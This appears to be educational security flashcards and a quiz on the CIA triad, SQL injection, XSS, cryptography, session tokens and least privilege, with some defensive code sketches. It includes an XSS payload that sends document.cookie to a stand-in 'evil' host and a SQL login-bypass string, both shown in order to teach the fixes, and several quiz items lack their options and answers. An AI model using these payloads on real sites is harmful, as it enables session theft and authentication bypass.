(1) Output encoding — escape HTML metacharacters (< → &lt;, > → &gt;, " → &quot;, & → &amp;) when rendering user content. Modern templating engines (React JSX, Vue {{ }}, Django, Jinja2) escape by default. (2) Content Security Policy (CSP) — an HTTP header that restricts which script sources the browser will execute, defending in depth even if encoding fails. (3) HttpOnly cookies for session tokens — so a successful XSS cannot directly read the token.
Escaping is the foundation; CSP and HttpOnly are layers on top. Most XSS bugs in the wild come from explicitly bypassing the templating engine’s default escaping (dangerouslySetInnerHTML, mark_safe, |safe, v-html).
Difficulty:Intermediate
Which CIA properties does a successful XSS attack typically violate?
Confidentiality (script reads cookies, tokens, DOM contents, and exfiltrates them) and Integrity (script modifies the page, submits forms in the victim’s name, posts on their behalf, changes settings). Availability violations are possible (a runaway script can wedge a browser tab) but uncommon in practice.
The reason XSS matters so much in the real world is that the attacker borrows the trusted site’s identity in the victim’s browser — the same-origin policy is no defense against a script that the trusted page itself appears to ship.
Difficulty:Basic
Define symmetric encryption, name a common algorithm, and state its main weakness.
Symmetric encryption uses the same secret key to both encrypt and decrypt. The most widely used algorithm today is AES (with 128-, 192-, or 256-bit keys). Symmetric ciphers are fast and well-suited to bulk data, but their main weakness is the key-distribution problem: sender and receiver must agree on the key without an attacker overhearing — and if they had a private channel for that, they would not need encryption.
Symmetric encryption is what TLS uses for the bulk data channel after the handshake. The handshake itself uses public-key cryptography to establish the symmetric key — combining the two solves the key-distribution problem.
Difficulty:Basic
Define public-key (asymmetric) cryptography, and explain how it solves the key-distribution problem.
Public-key cryptography generates a pair of mathematically linked keys: a public key that anyone may have, and a private key kept secret by the owner. A message encrypted with one key of the pair can only be decrypted by the other key. To send Alice a private message, Bob encrypts with Alice’s public key — only her private key can decrypt it. No prior shared secret is needed; Alice’s public key can be published freely.
RSA, ECC (elliptic-curve), and Diffie-Hellman are the standard families. Public-key operations are slow per byte, so they are typically used to negotiate a symmetric key that does the bulk encryption — the design at the heart of TLS.
Difficulty:Basic
Alice wants to send Bob a private message using public-key cryptography. Which key does she use to encrypt?
Bob’s public key. Anyone may have it, so Alice can use it without prior secret sharing — but only Bob’s matching private key (which only Bob holds) can decrypt the resulting ciphertext.
Common confusion: students reach for Alice’s private key by analogy with signatures. That direction (encrypt with one’s own private key) is what produces a signature, not a private message — anyone with Alice’s public key could decrypt it, so the contents are not secret.
Difficulty:Intermediate
What is a digital signature, and how does it work?
A digital signature proves that a document was produced by the holder of a particular private key, and that the document has not been altered. The signer (1) computes a cryptographic hash of the document (SHA-256, e.g.); (2) encrypts the hash with their private key — that encrypted hash is the signature. To verify, anyone with the document, the signature, and the signer’s public key decrypts the signature, recomputes the hash from the document, and checks the two match.
Signatures provide integrity and authenticity — they do not provide confidentiality (the document is sent in the clear next to its signature). For both confidentiality and authenticity, encrypt-then-sign or sign-then-encrypt — there are subtle ordering issues; libraries like libsodium handle this for you.
Difficulty:Intermediate
Why do digital signature schemes hash the document first, instead of encrypting the whole document with the private key?
Performance. Public-key operations are roughly three orders of magnitude slower per byte than a fast hash like SHA-256. Hashing reduces every document — regardless of size — to a fixed-length digest (32 bytes for SHA-256), so the slow public-key operation runs over those 32 bytes instead of the whole document. The hash’s collision-resistance also means an attacker cannot construct a different document with the same hash and therefore the same signature.
Without hashing, signing a 1 GB file would require running RSA over a gigabyte of data. With hashing, RSA still runs over 32 bytes — independent of the file’s size.
Difficulty:Intermediate
Why is sending the username and password on every request a bad authentication design?
(1) Slow — the server must verify the password (with a deliberately slow hash like bcrypt or Argon2) on every request, adding tens of milliseconds of CPU per call. (2) Insecure — the cleartext password lives in the client’s memory for the lifetime of the session and crosses the network on every request, multiplying the chances of leaking via a log file, debug trace, or proxy header.
The standard fix is to authenticate once with username and password and then issue a short-lived token (session ID or JWT) that rides on subsequent requests. The expensive password check happens once; the cheap token check happens on every call.
Difficulty:Intermediate
How does session-based authentication (with a session cookie) work, and what are the three cookie flags that harden it?
After successful login, the server generates a random opaque session ID mapping to the user, stores it in a server-side session store, and returns it to the client in a cookie. The browser automatically attaches the cookie to every subsequent request to the same domain. Three hardening flags: HttpOnly (cookie not readable from JavaScript), Secure (cookie only sent over HTTPS), SameSite=Strict or Lax (cookie not attached to cross-site requests, defending against CSRF).
Sessions are stateful (the server keeps a session store) but easy to revoke — invalidate the row in the store and the session is dead immediately.
Difficulty:Intermediate
What is a JSON Web Token (JWT), and how does it differ from a session cookie?
A JWT is a small encoded JSON document — typically { sub: <user-id>, exp: <expiry>, … } — digitally signed by the server’s key. The client attaches it to every request (in an Authorization: Bearer … header or in a cookie). The server verifies the signature with its own key and trusts the claims without consulting any database. Unlike a session cookie, there is no server-side session store; the JWT is the session, and the signature is what makes it forgery-proof.
Statelessness is the JWT win (no shared session store; easier horizontal scaling). The price is harder revocation — without a session store, a stolen JWT remains usable until its exp time.
Difficulty:Advanced
What are the trade-offs between session cookies and JWTs?
Session cookies: stateful (need a session store), easy to revoke (delete the row), simple. JWTs: stateless on the server (no session store; easier horizontal scaling), but harder to revoke (a stolen JWT stays usable until exp). Both are vulnerable to XSS-driven session-riding; both should be served only over TLS. JWTs in localStorage are XSS-readable (avoid). JWTs in HttpOnly + SameSite cookies match the session-cookie security profile.
Standard production pattern for JWTs: short access-token expiry (5–15 min) plus a longer-lived refresh token tracked server-side. The refresh token gives you back a revocation lever; the short access-token expiry bounds the damage of a leak.
Difficulty:Advanced
Does the HttpOnly cookie flag fully protect a session against XSS? Explain.
No. HttpOnly prevents JavaScript from reading the cookie, so a successful XSS attack cannot directly exfiltrate the session token. But the script can still use the session: any fetch('/api/...', { credentials: 'include' }) call will have the cookie attached automatically by the browser, so the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding.
HttpOnly is valuable but not sufficient. Defense in depth: prevent XSS in the first place (output encoding), add a strict CSP, set SameSite=Strict on session cookies, and require fresh authentication for sensitive actions (transfer money, change password).
Difficulty:Basic
State the Zero Trust security principle in one sentence and give one operational consequence.
Zero Trust says users and devices should not be trusted by default — every request must be authenticated and authorized regardless of where it originates, and every input must be validated and sanitized regardless of its source. Operational consequence: draw the trust boundary tightly. Inputs from end users, third-party APIs, file uploads, configuration files, and even other internal services must be validated at the boundary they cross into your code.
Zero Trust replaced the older ‘castle and moat’ / perimeter model, which assumed that anything inside the corporate network was trustworthy. That assumption fails against insider threats, compromised internal hosts, and supply-chain attacks.
Difficulty:Intermediate
What is security through obscurity, and why is it a bad foundation?
Security through obscurity is the practice of relying on hiding the design or mechanism of a system to keep it secure (a hidden URL, a custom-rolled hash, an unpublished port). It is a bad foundation because as soon as anyone reverses or discovers the design, the entire defense collapses — the lecture’s analogy is hiding the house key in a flowerpot. Real security must rest on something that stays secret even when the design is public — typically a key — which is what the Open Design principle requires.
Obscurity is not useless; it is just not a foundation. Hiding your specific framework versions and config (complementary obscurity) is reasonable defense-in-depth on top of strong open mechanisms — never instead of them.
Difficulty:Advanced
When should you apply public scrutiny vs. complementary obscurity?
Public scrutiny when proposing a new security approach or algorithm — expose the design to the security community so weaknesses are found before attackers exploit them. Complementary obscurity when deploying an existing, well-scrutinized technology in a real product — hide implementation specifics (framework versions, configuration, internal endpoints) to slow down opportunistic attackers who look for known vulnerabilities. The two apply to different layers and are not contradictory.
AES, RSA, and TLS are all openly published — they had to be, to earn trust. But you should not advertise that your production server runs Apache 2.4.49 with a particular CVE outstanding.
Difficulty:Intermediate
State the Principle of Least Privilege and give one concrete application.
Principle of Least Privilege: every program and every privileged user of the system should operate using the least set of privileges necessary to complete its job. Concrete application: split a monolithic app into small components, each with narrowly scoped permissions — the email-notification service holds only the email-API credential, the image-upload service holds only write access to the upload bucket. If one component is compromised, the blast radius is limited to what that component’s credentials can do.
Originally formulated by Saltzer and Schroeder (1975). Cloud IAM systems (AWS IAM, GCP IAM, Kubernetes RBAC) are designed around it. Running every service as the database owner with full network egress is one of the most common findings in real security audits — and one of the most damaging when exploited.
Difficulty:Basic
What four questions does a security plan answer?
(1) Security model — what are you defending? (assets: data, services, secrets, reputation). (2) Threat model — who might be attacking, and what are they trying to achieve? (3) Attack surface — which parts of the system are exposed to an attacker? (4) Protection mechanisms — how do we prevent (or detect) compromise?
Walk these four for any system you build or inherit. A defense built without a matching threat model fails — the foil-cover-on-an-emergency-phone is the canonical example.
Difficulty:Intermediate
What four dimensions does a useful threat model describe?
(1) Knowledge — what does the attacker already know? (Public docs only? Stolen source code? Insider with credentials?) (2) Actions — what can they actually do? (Send web requests? Run code on a guest VM? Tap the network?) (3) Resources — how much time, money, and infrastructure can they spend? (Bored teenager? Criminal cartel? Nation-state?) (4) Incentive — why do they want to compromise the system? (Financial gain? Espionage? Vandalism?)
Different threat models warrant different defenses. A consumer mobile app and a defense contractor’s collaboration tool may use the same primitives (TLS, auth, encryption at rest) but the strength and layering differ by orders of magnitude.
Difficulty:Advanced
What is the attack surface of a system, and why does shrinking it matter?
The attack surface is the set of inputs, endpoints, ports, and side channels through which an attacker could plausibly interact with the system — every public API, every form field, every file path, every network port, every dependency. Shrinking it matters because every exposed surface is a place a vulnerability could live. The fewer surfaces, the fewer things to defend, the fewer things to test, and the smaller the chance of an unmonitored entry point.
Standard moves to shrink attack surface: turn off unused features, close unused ports, drop unused dependencies, restrict admin interfaces to a private network, expose only the smallest public API needed. The Principle of Least Privilege shrinks the blast radius once an attacker is in; shrinking the attack surface tries to keep them out in the first place.
Difficulty:Intermediate
Why are session cookies still vulnerable to XSS even when HttpOnly is set?
Because XSS gives the attacker code execution inside the trusted page’s origin. Even though the script cannot read the cookie (thanks to HttpOnly), it can still issue authenticated fetch requests through the browser — the browser will attach the cookie automatically. So the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding.
The right framing: HttpOnly prevents theft of the session ID, not use of the session. Defense in depth — strict CSP, output encoding, SameSite=Strict — is what prevents XSS from being weaponized in the first place.
Difficulty:Advanced
Distinguish authenticity from the three CIA properties. Why isn’t it part of the triad?
Authenticity is the property that a message can be reliably attributed to a particular sender — typically achieved with a digital signature or a message-authentication code. It is closely related to integrity (both detect tampering) but adds the who. The classical CIA triad omits it because authenticity and the related properties of non-repudiation and accountability were historically treated as distinct goals. Modern variants (CIANA, the Parkerian hexad) often add Authenticity (and sometimes Possession, Utility) explicitly — useful, but not what the standard CIA triad refers to.
On a quiz that asks about ‘the CIA triad’, stick with C/I/A. If the question is about general security goals, naming Authenticity / Non-repudiation alongside is reasonable and shows depth.
Security and Authentication Quiz
Test your ability to reason about the CIA triad, web vulnerabilities, cryptographic primitives, authentication, and security design principles in realistic scenarios — not just recite definitions.
Difficulty:Basic
Which of the following is not one of the three security attributes in the CIA triad?
Confidentiality is one of the three. The triad is Confidentiality, Integrity, Availability.
Integrity is one of the three. The triad is Confidentiality, Integrity, Availability.
Availability is one of the three. The triad is Confidentiality, Integrity, Availability.
Correct Answer: Authenticity.
Explanation
The CIA triad is Confidentiality, Integrity, Availability — the three classical attributes of information security. Authenticity (and the related properties of non-repudiation and accountability) is a real and important security goal, but it is not part of the CIA triad. Some textbooks add Authenticity as part of an extended CIANA or Parkerian hexad model — useful, but not what the standard triad refers to.
Difficulty:Basic
A ransomware attack encrypts the only copy of a hospital’s patient records. Doctors cannot read them, and the on-disk bytes have been replaced with attacker-controlled ciphertext. Which CIA properties has the attack violated? (Select all that apply.)
Confidentiality means unauthorized reads — attackers gaining access to data they shouldn’t see.
A pure ransomware attack typically does not exfiltrate the data; it just makes it unreadable to the
rightful owner. (Modern “double-extortion” ransomware also exfiltrates, which would add a
confidentiality violation — but the encryption-in-place attack on its own does not.)
Correct — overwriting the on-disk bytes with attacker-controlled ciphertext changes the data without
authorization, which is exactly what an integrity violation is.
Correct — the data is no longer accessible to the legitimate users who need it (doctors, the
hospital), which is exactly what an availability violation is.
Correct Answers: Integrity and Availability.
Explanation
Encrypting the data in place violates Integrity (the bytes have been changed by an unauthorized party) and Availability (the legitimate users can no longer reach their data). A pure ransomware attack typically does not violate confidentiality, because the attackers don’t need to read the data — they just need to make it unreadable to its owner. Modern ‘double-extortion’ ransomware exfiltrates and encrypts, which would add a confidentiality violation; classical ransomware does not.
Difficulty:Basic
Attackers exploit an unpatched server vulnerability and download the personal records of 147 million users — names, dates of birth, Social Security numbers. None of the data on the company’s servers is altered or deleted. Which CIA property is primarily violated?
Integrity would mean the data was modified without authorization. Here the records on the company’s
servers were not changed — they were just read by the wrong party.
Availability would mean legitimate users could no longer reach the data. The company’s services kept
running normally; the breach was that strangers obtained a copy of the data.
Correct Answer: Confidentiality.
Explanation
Confidentiality is the violation here. Sensitive data was disclosed to people who had no business reading it. Integrity would mean the data on the company’s servers was changed; Availability would mean it was inaccessible to the company. This is the textbook shape of a data exfiltration breach (the Equifax 2017 incident is the canonical example) — pure confidentiality, with no on-server damage.
A login handler builds its query as SELECT * FROM Users WHERE Name = "<typed username>" AND Pass = "<typed password>", where <typed username> and <typed password> are concatenated into the SQL string. What is the most direct vulnerability in this code?
Cross-site scripting is about user-supplied content being rendered as code in a browser. This bug
is about user-supplied content being executed as code by a database.
Slow queries are a performance concern, not the vulnerability the code is exposing. The injection
bug is present even if the query is fast.
Phishing is a social-engineering attack on the user to obtain credentials. This bug lets an
attacker bypass the password check directly, without needing to phish anyone.
Correct Answer: SQL injection.
Explanation
Building a SQL query by string-concatenating user input creates a SQL injection vulnerability: a payload like " or ""=" makes the password predicate trivially true, logging the attacker in without knowing the password. The fix is to use parameterized queries / prepared statements, where the SQL is parsed once with placeholders and the user input is bound separately as values.
Difficulty:Intermediate
A developer fixes the SQL injection bug from the previous question by switching to a parameterized query:
SELECT * FROM Users WHERE Name = @0 AND Pass = @1
with name and pass passed as separate arguments to the database driver. What is the primary reason this prevents SQL injection?
Some drivers do escape quotes in some modes, but escaping is fragile and bypassable across encodings.
The strong guarantee comes from separation, not substitution: the SQL is parsed before the values
are even attached.
Encryption in transit is a separate concern (TLS) and does not prevent injection. An attacker who
controls the input string is already inside the trust boundary of the application, regardless of
whether the wire is encrypted.
Keyword blocklists are a classic anti-pattern — they are easy to evade with obfuscation, comments,
case games, and Unicode tricks. The actual mechanism is structural: the values arrive after parsing
and cannot influence the query’s structure.
Correct Answer:
Explanation
Parameterized queries protect against SQL injection through structural separation: the database receives the SQL with placeholders, parses it into a query plan, and only then binds the parameter values into that plan. The values never traverse the SQL parser, so they cannot grow new SQL syntax (extra clauses, comments, sub-queries). Escaping and blocklisting are weaker, error-prone alternatives; parameterization is the only fix that is robust to all the corner cases.
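For contrast, a sketch of the parameterized version with the same illustrative sqlite3 setup; the ? placeholders play the role of @0 and @1 in the question.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (Name TEXT, Pass TEXT)")
conn.execute("INSERT INTO Users VALUES ('alice', 'hunter2')")

def get_user_parameterized(conn, username, password):
    # The SQL text is fixed and parsed as-is; the driver ships the values
    # separately, so they can never add clauses, comments, or sub-queries.
    return conn.execute(
        "SELECT * FROM Users WHERE Name = ? AND Pass = ?",
        (username, password),
    ).fetchall()

# The injection payload is now compared as a literal string and matches nothing:
print(get_user_parameterized(conn, "alice", "' or ''='"))   # []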
Difficulty:Intermediate
A social-media site lets users post comments and renders each comment by interpolating the comment text directly into the HTML page. Another user later views the post in their browser. Which CIA properties can a successful XSS payload violate in this scenario? (Select all that apply.)
Don’t omit this one — reading cookies and session tokens is the most common goal of XSS attacks.
Once exfiltrated, the attacker can impersonate the victim against the trusted site.
Don’t omit this one — XSS routinely mutates the DOM, defaces pages, or fires off authenticated
requests as the victim (changing settings, posting comments, transferring funds in vulnerable apps).
Correct Answers:
Explanation
XSS primarily violates Confidentiality (cookies and tokens read and exfiltrated) and Integrity (the page is mutated and authenticated requests are issued in the victim’s name). Availability violations are possible — a runaway script can wedge the victim’s browser — but they are the least common goal of XSS in practice. The shared root cause with SQLi is user-supplied data being treated as code by some downstream interpreter (the database for SQLi, the browser for XSS); the fix in both cases is to keep code and data separate.
Difficulty:Intermediate
Your team is shipping a comments feature on a blog. Which defense most directly prevents XSS attacks via the comment field?
Length limits don’t help — <script>fetch('//evil/?c='+document.cookie)</script> already fits in
well under 280 characters, and so do most worm payloads. The vulnerability is about content, not
size.
Keyword blocklists are a classic anti-pattern. An attacker can use <img src=x onerror=...>,
<svg onload=...>, or other tags that don’t contain the word “script” at all. Filtering by string
match always loses to a clever attacker.
Storing the comment in a different table affects how data is laid out at rest, but it doesn’t
change how the comment is rendered. The XSS happens at render time, in the victim’s browser, when
the attacker-supplied HTML is interpolated into the page.
Correct Answer:
Explanation
The primary fix for XSS is output encoding: when user-supplied content is rendered into HTML, escape the metacharacters so the browser interprets them as text, not as tag boundaries. Modern templating engines (React JSX, Vue {{ }}, Django, Jinja2) escape by default — XSS bugs typically appear when developers explicitly bypass the escaping (dangerouslySetInnerHTML, mark_safe, |safe, v-html). Layered defenses (a strict Content Security Policy, HttpOnly cookies for session tokens) help in depth, but escaping at the rendering boundary is the foundation.
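As a minimal illustration, Python's html.escape stands in here for a template engine's auto-escaping; render_comment is a hypothetical helper, not part of the question.

from html import escape

def render_comment(comment_text):
    # escape() turns <, >, &, " and ' into entities, so the browser
    # renders the comment as text instead of parsing it as markup.
    return '<li class="comment">' + escape(comment_text) + "</li>"

payload = "<script>fetch('//evil/?c='+document.cookie)</script>"
print(render_comment(payload))
# <li class="comment">&lt;script&gt;fetch(&#x27;//evil/?c=&#x27;+document.cookie)&lt;/script&gt;</li>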
Difficulty:Advanced
A startup announces a new “proprietary, never-before-published” encryption algorithm that they claim is unbreakable because “nobody knows how it works”. What is the most fundamental problem with this approach to security?
Performance is a legitimate but secondary concern. The deeper problem is that the security
depends on the design staying hidden — and designs do not stay hidden.
Patent considerations are a business question. The security question is whether the design will
survive contact with attackers, and a hidden algorithm has not been tested.
Some encryption algorithms are subject to export restrictions, but most are not — and that is not
what makes obscurity-based security a bad foundation. The issue is that the design will be
reverse-engineered, and then the algorithm has nothing left.
Correct Answer:
Explanation
This is the classic Security through Obscurity anti-pattern. Open Design says the security of a system must rest on something that stays secret even when the design is public — typically a key. AES, RSA, and TLS are all openly published; their security depends on the secrecy of keys, not algorithms. Public scrutiny is not a bug — it is the mechanism by which weaknesses are discovered and patched. A ‘secret algorithm’ has had none of that scrutiny and will fall to the first determined attacker who reverses it.
Difficulty:Advanced
Two scenarios. (1) A research team has just designed a new public-key signature scheme and wants to know whether it is secure. (2) A company is about to deploy a production system using a well-studied existing TLS library. Which is the right disclosure stance for each?
Hiding everything is the obscurity-only stance and is exactly the failure mode the Open Design
principle exists to prevent. New algorithms in particular need scrutiny to find weaknesses before
attackers do.
Publishing the design of a new algorithm is right. Publishing the exact running version and
configuration of a production deployment hands attackers a free reconnaissance map — known
vulnerabilities in specific framework versions become trivial to weaponize.
This inverts both rules. A new algorithm without scrutiny is fragile; publishing exact production
config invites attackers to map known CVEs onto your deployment.
Correct Answer:
Explanation
Public scrutiny for new security designs (so weaknesses are found by the community before they ship to attackers) and complementary obscurity for deployed systems (hide your specific framework versions and config, so opportunistic exploits don’t get a free aim) are not contradictory — they apply to different layers. The foundation (the algorithm, the protocol) must be open. The deployment specifics (versions, ports, paths) can reasonably stay hidden as a defense-in-depth layer on top of an already-strong foundation.
Difficulty:Basic
Alice wants to send a private message to Bob that only Bob can read, using public-key cryptography. Whose key, and which one, should Alice use to encrypt the message?
Encrypting with Alice’s private key is what a digital signature does — anyone with Alice’s
public key can decrypt it, so it is not a secret. It proves Alice wrote the message but does not
keep its contents private.
If Alice encrypts with her own public key, only her own private key can decrypt. Bob would not
be able to read it.
Alice does not have Bob’s private key (and should not — that is the whole point of “private”).
Encrypting to Bob is done with his public key.
Correct Answer:
Explanation
To send a message that only Bob can read, encrypt with Bob’s public key. Anyone may have that key, so Alice can use it without prior secret sharing — but only Bob’s matching private key (which only Bob holds) can decrypt the resulting ciphertext. This is what makes public-key cryptography solve the key-distribution problem that symmetric encryption suffers from: no shared secret needs to be established before private communication can begin.
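A sketch of that flow using the third-party cryptography package; the key size and OAEP padding are illustrative choices, not requirements from the question.

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

# Bob generates a key pair once and publishes only the public half.
bob_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
bob_public_key = bob_private_key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Alice needs only the public key; no prior shared secret is required.
ciphertext = bob_public_key.encrypt(b"Meet at noon.", oaep)

# Only Bob's matching private key can undo it.
assert bob_private_key.decrypt(ciphertext, oaep) == b"Meet at noon."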
Difficulty:Intermediate
In practice, a digital signature scheme hashes the document first and then encrypts the hash with the signer’s private key — rather than encrypting the entire document. Why?
Hashes are not encryption — they are one-way fingerprints. They provide integrity (any change to
the document changes the hash), not confidentiality.
Encrypting the document with the private key would let anyone with the public key decrypt and
read it — so the document would still be readable. The reason for hashing is performance, not
readability. (And digital signatures don’t aim for confidentiality in the first place.)
Cryptographic hashes are not reversible — that is exactly why they are usable as fingerprints.
Reversibility would defeat the integrity guarantee.
Correct Answer:
Explanation
Public-key operations (RSA in particular) are roughly three orders of magnitude slower per byte than a fast hash like SHA-256. Hashing first reduces any document to a 32-byte digest, so the expensive public-key operation runs over those 32 bytes regardless of the document’s original size. The hash’s collision-resistance is what keeps the signature meaningful — an attacker cannot construct a different document that produces the same hash and therefore the same signature. Signatures provide integrity and authenticity, not confidentiality.
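A sketch of hash-then-sign with the same cryptography package; its sign() call hashes the document with SHA-256 internally, so the expensive private-key operation only ever sees the digest, whatever the document's size.

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature

signer_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
signer_public_key = signer_private_key.public_key()

document = b"Pay Bob $100." * 100_000   # size doesn't matter: only the digest is signed
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                  salt_length=padding.PSS.MAX_LENGTH)

signature = signer_private_key.sign(document, pss, hashes.SHA256())

# Verification recomputes the hash; any change to the document breaks it.
signer_public_key.verify(signature, document, pss, hashes.SHA256())
try:
    signer_public_key.verify(signature, document + b"0", pss, hashes.SHA256())
except InvalidSignature:
    print("tampered document rejected")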
Difficulty:Intermediate
A junior engineer proposes that the client send the username and password on every request, and the server verifies them every time. Which problems does this design have? (Select all that apply.)
Don’t omit this one — slow password hashing on every request is a real performance problem. The
whole point of session IDs and JWTs is to amortize the password check.
Don’t omit this one — keeping the cleartext password live in memory and sending it on every
request multiplies the chances of it being exposed.
Query length is irrelevant. The problems are performance and security exposure, not SQL aesthetics.
Putting passwords in URL query strings is a well-known anti-pattern — URLs are logged on servers,
proxies, browser history, and referer headers. This option is the opposite of helpful.
Correct Answers:
Explanation
Sending the password on every request is slow (passwords are deliberately hashed with a slow algorithm — bcrypt, Argon2 — that is fine to run on login but expensive to repeat on every API call) and insecure (the cleartext credential lives in memory and on the wire for the whole session, with many opportunities to leak). The standard fix is to authenticate once, then issue a short-lived session token (a session ID or JWT) that rides on subsequent requests in the client’s place.
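A minimal sketch of that fix, assuming the third-party bcrypt package and an in-memory session store; SESSIONS, login, and authenticated_request are illustrative names.

import secrets
import bcrypt

SESSIONS = {}   # session_id -> username (a server-side store)

def login(username, password, stored_hash):
    # The slow, deliberate bcrypt check runs only here, at login time.
    if not bcrypt.checkpw(password.encode(), stored_hash):
        return None
    session_id = secrets.token_urlsafe(32)   # unguessable random token
    SESSIONS[session_id] = username
    return session_id

def authenticated_request(session_id):
    # Later requests present only the token; no password and no bcrypt involved.
    return SESSIONS.get(session_id)

stored = bcrypt.hashpw(b"hunter2", bcrypt.gensalt())   # done once, at registration
sid = login("alice", "hunter2", stored)
print(authenticated_request(sid))   # 'alice'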
Difficulty:Advanced
A web app stores its session tokens in HttpOnly cookies and reads them only on the server. A teammate concludes: “That makes the app immune to XSS — the script can’t read the cookie, so we’re safe.” What is wrong with this conclusion?
XSS gives the attacker code execution inside the trusted page. Even without reading the cookie,
that code can do anything the legitimate page can do — including issuing authenticated requests
that the browser will attach the cookie to automatically.
HttpOnly is a long-standing, fully supported cookie attribute. The teammate’s mistake is
conceptual, not about browser support.
HttpOnly is supported by every major browser. The error is in confusing theft of the token
with use of the session.
Correct Answer:
Explanation
HttpOnly is a valuable defense — it prevents JavaScript from reading the session ID and exfiltrating it — but it does not prevent the script from using the session. A script running in the trusted origin can call fetch('/api/...', { credentials: 'include' }) and the browser will attach the cookie automatically. So the attacker rides the session in the victim’s browser without ever touching the raw token. This is sometimes called session-riding. Layered defenses — strict CSP, output encoding to prevent XSS in the first place, SameSite=Strict cookies — are needed; HttpOnly alone is not enough.
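For reference, a sketch of issuing the cookie with those layered flags, using Flask with illustrative route and cookie names; note that none of these flags stops a script already running inside the page, which is why preventing the XSS itself remains the real fix.

import secrets
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    resp = make_response("logged in")
    resp.set_cookie(
        "session_id",
        secrets.token_urlsafe(32),
        httponly=True,        # scripts cannot read the value
        secure=True,          # sent only over HTTPS
        samesite="Strict",    # not attached to cross-site requests
    )
    return resp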
Difficulty:Advanced
Which of the following are accurate trade-offs of using a JSON Web Token (JWT) instead of a server-managed session cookie? (Select all that apply.)
Don’t omit — statelessness is the headline JWT advantage. No session store means no shared
coordination between backends.
Don’t omit — revocation is the headline JWT disadvantage. A stolen JWT is good until it expires;
you cannot just “log it out” of a database the way you can a session ID.
Don’t omit — localStorage is XSS-readable, which makes JWTs in localStorage worse than
HttpOnly cookies. The choice of where to store the JWT matters as much as the choice between
JWTs and session cookies.
Forgery resistance comes from the signing key held by the server. Anyone with the key can forge
a JWT; “no one can forge it” is wrong without that qualification.
TLS protects the transport — confidentiality of the request body, the URL, and the bearer token
itself in flight. A JWT signature does not cover any of that. Always use HTTPS regardless of
token format.
Correct Answers:
Explanation
JWTs trade a server-side session store for a signed, client-side token. The headline benefit is statelessness (no shared session store between backends — easier horizontal scaling). The headline costs are difficulty of revocation (no centralized ‘log out’ before exp) and the storage problem (localStorage is XSS-readable). Two things JWTs do not do: they don’t eliminate the need for HTTPS, and they don’t prevent forgery without key secrecy — anyone holding the signing key can mint a valid token.
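A hand-rolled sketch of the HS256 token shape makes both headline points visible: verification needs no server-side store, and anyone holding the signing key can mint a valid token. This is illustrative only; a real system would use a vetted library such as PyJWT.

import base64, hashlib, hmac, json, time

SIGNING_KEY = b"server-side-secret"   # illustrative; keep real keys out of source

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def mint_jwt(claims):
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    sig = b64url(hmac.new(SIGNING_KEY, f"{header}.{payload}".encode(),
                          hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"

def verify_jwt(token):
    header, payload, sig = token.split(".")
    expected = b64url(hmac.new(SIGNING_KEY, f"{header}.{payload}".encode(),
                               hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None   # forged or tampered
    claims = json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))
    if claims.get("exp", 0) < time.time():
        return None   # expired (the only built-in cutoff a bare JWT has)
    return claims

token = mint_jwt({"sub": "alice", "exp": time.time() + 600})   # 10-minute token
print(verify_jwt(token))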
Difficulty:Advanced
You are designing a small e-commerce backend with four components: a Product Display service, an Email Notification service, an Image Upload service, and a System Backup service. Following the Principle of Least Privilege, which permission set is most appropriate for the Email Notification service?
Full read/write to every table is the opposite of least privilege. If the notification service
is compromised, the attacker now owns the entire database. The notification service does not need
to write to any table to send an email.
Read-only-everywhere is better than read/write-everywhere, but still gives an attacker who
compromises the notification service a free dump of every table. The data the email needs should
be passed in (or fetched from a narrow read-only view), not retrieved by querying every table.
Root on the host is the worst possible answer — it is the upper bound of privilege, not the lower
bound. OS-level tuning of email queues should be done by an explicit admin process, not by the
running service.
Correct Answer:
Explanation
The Email Notification service has one job: send email. It needs only the credential for the email-sending API and no database access. If it is later compromised — through a vulnerable dependency, a misconfigured handler, an injected payload — the blast radius is limited to whatever harm that one credential can do (sending unwanted email), not to the whole database. The pattern generalizes: each component holds the narrowest set of permissions that lets it do its job. AWS IAM, GCP IAM, and Kubernetes RBAC are all designed around this model.
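As a tiny illustration of that wiring, each service object is handed only the one credential its job requires; all names here are hypothetical.

from dataclasses import dataclass

@dataclass
class EmailNotificationService:
    email_api_key: str   # the only credential this service holds

    def send_order_confirmation(self, to_address, order_summary):
        # The data to include arrives as arguments; the service holds no
        # database credential, so a compromise can only send unwanted mail.
        print(f"emailing {to_address}: {order_summary} (key {self.email_api_key[:4]}...)")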
Difficulty:Advanced
An emergency telephone in a hospital lobby is meant to dial only 9-1-1. To enforce this, the buttons are covered with an aluminum foil shield with cutouts for the digits “9” and “1”. Which security plan element is most clearly broken in this design?
The system is defending something real (preventing misuse of the emergency line). The failure
is in who and how the attack might happen, not in whether defending it is worthwhile.
The technology of the lock is not the issue. A correctly-designed mechanical cover would still be
a valid defense — the design here just got the threat model wrong.
Smaller attack surfaces are better, not worse. Exposing more buttons would make the system more
vulnerable, not more secure.
Correct Answer:
Explanation
The defense assumes the attacker will only try to press one digit at a time, so cutouts for just ‘9’ and ‘1’ are enough. But the attacker can dial any number whose digits are drawn from {9, 1} — for example 911-1119 is a perfectly valid 7-digit US number that this cover allows. The mistake is in the threat model — the description of what an attacker might do — not in the strength of the defense itself. The same image also illustrates an attack-surface problem (the foil itself can be torn or pushed sideways), but the most fundamental error is the threat-model misjudgment.
Difficulty:Expert
